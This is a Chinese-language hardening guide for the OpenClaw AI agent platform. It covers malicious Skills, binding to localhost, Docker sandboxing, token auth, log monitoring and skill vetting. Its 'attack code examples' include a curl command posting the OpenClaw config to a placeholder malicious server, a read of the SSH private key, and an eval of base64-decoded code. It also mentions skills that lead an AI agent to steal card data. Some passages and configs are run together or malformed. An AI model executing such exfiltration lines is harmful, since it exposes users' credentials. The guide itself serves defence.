从公开信息及工信部预警来看,OpenClaw 的风险点主要集中在以下几类:
2026年3月,OpenClaw社区爆发大规模安全事件,造成严重损失:
常见恶意 Skills 伪装:
攻击代码示例:
// 偷取OpenClaw配置
curl -X POSThttps://恶意服务器.com/steal \
-d "$(cat ~/.openclaw/openclaw.json)"
// 读取SSH密钥
const sshKey = fs.readFileSync('~/.ssh/id_rsa')
// 执行恶意代码
eval(base64.decode('恶意代码'))
一个恶意Skill可能导致全部资产归零,必须高度警惕。
这是最重要的一步,可阻断 90% 的黑客攻击。
命令行方式:
openclaw config set server.host 127.0.0.1
配置文件方式(Windows):
C:\Users\你的用户名\AppData\Local\OpenClaw)config.json 或 .env 文件,用记事本打开"host":"0.0.0.0"
改为:
"host":"127.0.0.1"
验证:打开浏览器输入 http://你的公网IP:18789,如果无法访问,则配置成功。
推荐方案:Tailscale 或 Cloudflare Tunnel
Tailscale 示例:
tailscale up --advertise-exit-node
Cloudflare Tunnel 示例:
cloudflared tunnel --url http://localhost:18789
注意:避免使用 Funnel 模式,选择 Serve 模式建立点对点加密连接。
useradd -m openclaw-user
passwd openclaw-user
usermod -aG docker openclaw-user
su - openclaw-user
docker run -d \
--name openclaw-lowpriv \
-p 18789:18789 \
-v /home/openclaw-user/openclaw/config:/app/config \
--privileged=false \
openclaw/runtime:v2026.3
关键配置说明:
--privileged=false:禁用特权模式,防止容器逃逸openclaw authcreate-token
保存生成的 token,用于客户端登录。
在 gateway.config.json 中设置:
{
"auth":{
"enabled":true,
"strategy":"token",
"token":"your-generated-long-token"
}
}
密码设置原则:
启用新设备接入审批机制,防止非法终端接入。
OpenClaw 内置 RBAC 权限体系,支持三种角色:
version:'3.8'
services:
openclaw:
image:openclaw/runtime:v2026.3
container_name:openclaw_sandbox
volumes:
-./workspace:/app/workspace:ro# 只读挂载
cap_drop:
-ALL# 剥离所有系统特权
networks:
-isolated_net
networks:
isolated_net:
driver:bridge
internal:true# 禁止外网连接
关键配置说明:
:ro:只读挂载工作区目录cap_drop: ALL:剥离所有系统特权internal: true:禁止外网连接:ro(只读)方式挂载/ 或用户主目录全量映射openclaw config set logging.level debug
tail -f ~/.openclaw/logs/app.log
grep "error\|delete\|rm" ~/.openclaw/logs/app.log
当检测到"异地登录"、"批量删除"等行为时,自动发送通知至邮箱或 Telegram。 可结合脚本实现熔断机制:
if [ $(grep -c "rm -rf"log) > 5 ]; then
docker stop openclaw;
fi
快速自检:
打开浏览器,输入 http://你的IP地址:18789
查 IP 方式:百度搜"IP",第一个结果就是。
参考网络隔离:关闭公网暴露章节。 懒人版:如果找不到配置文件,直接卸载重装,安装时遇到"允许网络访问"的选项,一律选"否"或"仅本地"。
127.0.0.1:18789)必须关闭的权限:
| 权限 | 为什么危险 | 如何关闭 |
|---|---|---|
| 自动执行代码 | 黑客可远程控制你的电脑 | 设置 → 关闭"允许执行本地脚本" |
| 访问浏览器 | 可窃取你的登录态和 Cookie | 设置 → 关闭"浏览器自动化" |
| 访问邮件客户端 | 可自动发送/删除邮件 | 设置 → 关闭"邮件集成" |
| 访问支付软件 | 可直接转账 | 设置 → 关闭"支付相关 API" |
每周花 30 秒,确认以下事项:
如果你怀疑已经被黑客入侵:
# OpenClaw 最高安全配置(禁止远程、禁止外网、仅本地、强限制)
listen_host:127.0.0.1
listen_port:18789
auth:
enabled:true
strategy:token
token:"your-generated-long-token-here-min-16-chars"
logging:
level:debug
file:~/.openclaw/logs/app.log
security:
allow_remote_access:false
enable_device_whitelist:true
max_login_attempts:5
auto_lockout_minutes:30
permissions:
allow_exec:false
allow_browser:false
allow_file_write:false
allow_network_access:false
| 项目 | 推荐做法 |
|---|---|
| API密钥管理 | 使用 .env 文件管理,严禁硬编码 |
| 系统更新 | 每月更新 OpenClaw 版本与系统补丁 |
| 数据备份 | 每周备份配置与数据卷,防止勒索攻击 |
| 技能安装 | 仅从官方 ClawHub 安装,避免第三方来源 |
| 安全审核 | 安装 skill-vetter 进行技能安全审核 |
skill-vetter 是你的 OpenClaw 安全守门员,安装任何 Skill 前必须先过它这关。
clawhub install skill-vetter
第1步:来源检查
第2步:代码审查(最重要) 检查20+危险信号,看到就警惕:
第3步:权限评估
第4步:风险分级
LOW 风险(放心装):
MEDIUM 风险(需确认):
EXTREME 风险(千万别装):
️ 不要随意安装 buy-anything、auto-shell 类高危技能,已有案例显示其可诱导 AI 窃取信用卡信息。
"本地运行 + 强密码 + 少给权限 + 不装来路不明的插件" 做到这四点,你的 OpenClaw 就比 90% 的用户安全。 OpenClaw 是个强大的工具,但工具越强大,用错代价越大。花 5 分钟做安全设置,换来的是安心使用。